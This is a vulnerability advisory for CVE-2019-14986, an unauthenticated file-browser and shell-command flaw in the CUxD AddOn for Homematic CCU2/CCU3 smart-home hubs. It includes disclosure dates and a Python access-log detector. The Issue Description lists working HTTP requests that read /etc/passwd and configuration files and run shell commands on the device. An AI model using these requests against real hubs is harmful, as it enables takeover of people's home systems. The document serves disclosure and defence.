CVE-2019-14986 eQ-3 Homematic CCU2 and CCU3 with the 'CUxD' AddOn version prior 2.3.0 installed allows administrative operations by unauthenticated attackers with access to the web interface, because features such as File-Browser and Shell Command (as well as 'Set root password') are exposed

Overview

  • CVE: CVE-2019-14986
  • Author: psytester
  • Title: eQ-3 Homematic CCU2 and CCU3 with the ‘CUxD’ AddOn version prior 2.3.0 installed allows administrative operations by unauthenticated attackers with access to the web interface, because features such as File-Browser and Shell Command (as well as “Set root password”) are exposed
  • Vulnerability Type: CWE-284: Improper Access Control
  • CVSSv3 Base Score: 10.0
  • CVSSv3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  • Publishing Date: 13.08.2019
  • Updated: –
  • Vendor: eQ-3 AG
  • Product: Homematic CCU2 and CCU3
  • Vendor eQ-3 contacted: 13.02.2019
  • Vendor eQ-3 response on 11.04.2019 with “not responsible for AddOns”
  • Addon itself:
    • Developer of ‘CUxD’ AddOn contacted: 07.05.2019
    • Developer of ‘CUxD’ AddOn confirmation: 08.05.2019
    • Affected ‘CUxD’ AddOn version: 2.2.0 and prior
    • ‘CUxD’ AddOn patched since version: 2.3.0

Background

From ELVjournal 06/2014 translated:
The Homematic additional software CUx-Daemon (short CUxD) is a universal interface between the Homematic central unit and components of other home control or SmartHome systems. These include the ELV FS20, FHT, HMS and EM/ESA systems, but also components of the EnOcean system and much more. By integrating these products, which are actually incompatible, the scope of the Homematic System can be extended beyond borders. In a multi-part article series we want to present CUxD, installations and possible uses in more detail.

From ELVjournal 02/2015 translated:
The general emergency management functions can be accessed via the URL “http://CCU-IP-Adresse/addons/cuxd/maintenance.html”. For example, all processes currently started on the CCU can be displayed here. A great advantage is that this page can be called up much faster than the WebUI and that even after a crash of the ReGaHss service, the WebUI or the CUxD, this website can still be accessed via web browser with all the functions offered. A CCU restart from a distance is also possible in case of problems. The last item “Shell command” can be used to start any CCU shell commands, the output takes place in a separate browser window.

From eQ-3 vendor’s website for CCU2:
HomeMatic Central Control Unit CCU2

Homematic Central Control Unit is the central element of your Homematic system, offering a whole range of control, monitoring and configuration options for all the Homematic devices in your installation
[….]

From eQ-3 vendor’s website for CCU3:
The Central Control Unit CCU3 is the central element for local control of the Homematic IP smart home system. It represents the next generation of our proven Homematic Central Control Units CCU1 and CCU2. Operation via the Central Control Unit CCU3 can be used alternatively to the Homematic IP Access Point. While the Access Point establishes the connection to the free Homematic IP cloud and enables operation of the smart home system via a smartphone app, the Central Control Unit CCU3 works locally via a browser-based web interface (WebUI). Thanks to local configuration and operation as well as the option to create direct device connections, reliable and fail-proof operation of the smart home system is guaranteed at all times – even in the event of Internet failures.
[….]

Issue Description

‘CUxD’ is the most popular AddOn for the Homematic CCU.
While analyzing the CCU web interface based on the page files in the file system path /www and the ‘CUxD’ AddOn management functions, another Improper Access Control issue was found, resulting in Remote Code Execution and Directory Traversal if a ‘CUxD’ AddOn version prior to 2.3.0 is installed.
This vulnerability can be exploited by unauthenticated attackers with access to the web interface: the CUxD administration interface can be secured with basic authentication, but this is not enforced during setup, and most installations remain unprotected.

The CUxD administration interface provides several service functions; the following HTTP requests, issued from a web browser, illustrate the attack vectors:

Built-in File-Browser for Directory Traversal:

http://1.2.3.4/addons/cuxd/index.ccc?file=%2fetc%2fpasswd
http://1.2.3.4/addons/cuxd/index.ccc?file=%2fusr%2flocal%2fetc%2fconfig%2fhomematic.regadom
http://1.2.3.4/addons/cuxd/index.ccc?file=%2ftmp%2fevent%2fsubscriber.list

Remote Code Execution via “Shell command” function:

http://1.2.3.4/addons/cuxd/index.ccc?pass=&maintenance=9&cmd=ls+-l+/etc
http://1.2.3.4/addons/cuxd/index.ccc?pass=&maintenance=9&cmd=cat+/etc/passwd
http://1.2.3.4/addons/cuxd/index.ccc?pass=&maintenance=9&cmd=cat+/usr/local/etc/config/homematic.regadom
http://1.2.3.4/addons/cuxd/index.ccc?pass=&maintenance=9&cmd=cat+/tmp/event/subscriber.list

Since CUxD version 2.3.0 this access is protected by default and requires a valid user session.
A user can still explicitly disable or weaken this protection, which is not advisable.
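As an added example (not part of the original advisory), the following detector scans web-server access-log lines for the two CUxD request patterns listed above and reports whether the CCU actually served them, which is what a defender would check to see if an unprotected CUxD interface has been reached. The log lines are constructed samples in Common Log Format, not real traffic; the field layout is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Common Log Format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Aug/2019:10:01:02 +0200] "GET /addons/cuxd/index.ccc?pass=&maintenance=9&cmd=cat+/etc/passwd HTTP/1.1" 200 1843
10.0.0.5 - - [13/Aug/2019:10:01:09 +0200] "GET /addons/cuxd/index.ccc?file=%2fusr%2flocal%2fetc%2fconfig%2fhomematic.regadom HTTP/1.1" 200 51200
10.0.0.7 - - [13/Aug/2019:10:02:00 +0200] "GET /addons/cuxd/index.ccc HTTP/1.1" 401 0
10.0.0.9 - - [13/Aug/2019:10:03:11 +0200] "GET /api/homematic.cgi HTTP/1.1" 200 512
"""

# Assumed CLF layout: client ip, ident, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

CUXD_PATH = "/addons/cuxd/index.ccc"  # CUxD AddOn endpoint named in the advisory


def classify(target):
    """Map one request target to the CUxD feature it invokes, or None."""
    parts = urlsplit(target)
    if parts.path != CUXD_PATH:
        return None
    q = parse_qs(parts.query, keep_blank_values=True)
    if q.get("maintenance") == ["9"] and "cmd" in q:
        # "Shell command" maintenance function; the decoded command is kept for the analyst
        return ("shell-command", q["cmd"][0])
    if "file" in q:
        # File-Browser function; parse_qs already percent-decodes the path
        return ("file-browser", q["file"][0])
    return None


def scan(log_text):
    """Return one finding per log line that hits a sensitive CUxD feature."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = classify(m.group("target"))
        if hit is None:
            continue
        kind, detail = hit
        # HTTP 200 means the interface answered the caller instead of rejecting it.
        findings.append({
            "ip": m.group("ip"),
            "kind": kind,
            "detail": detail,
            "served": m.group("status") == "200",
        })
    return findings
```

A 401 on the bare endpoint (third sample line) is the expected response from an installation that has basic authentication enabled.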

CVE

CVE-2019-14986

CVSSv3 Base Score

CVSSv3 Base Score: 10.0

CVSSv3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Credit

psytester

Don’t own an original CCU2 or CCU3, but want to analyze the CCU ‘for free’?
You can download:
  • piVCCU for running the original CCU3 firmware in an LXC container on a Raspberry Pi
  • RaspberryMatic for running the open-source OCCU-based release on different boards

Disclaimer

The information provided is released “as is” without warranty of any kind. The publisher disclaims all warranties, either express or implied, including all warranties of merchantability. No responsibility is taken for the correctness of this information. In no event shall the publisher be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if the publisher has been advised of the possibility of such damages.

The contents of this advisory are copyright (c) 2019 by psytester and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.

Written on August 12, 2019 | Last modified on August 13, 2019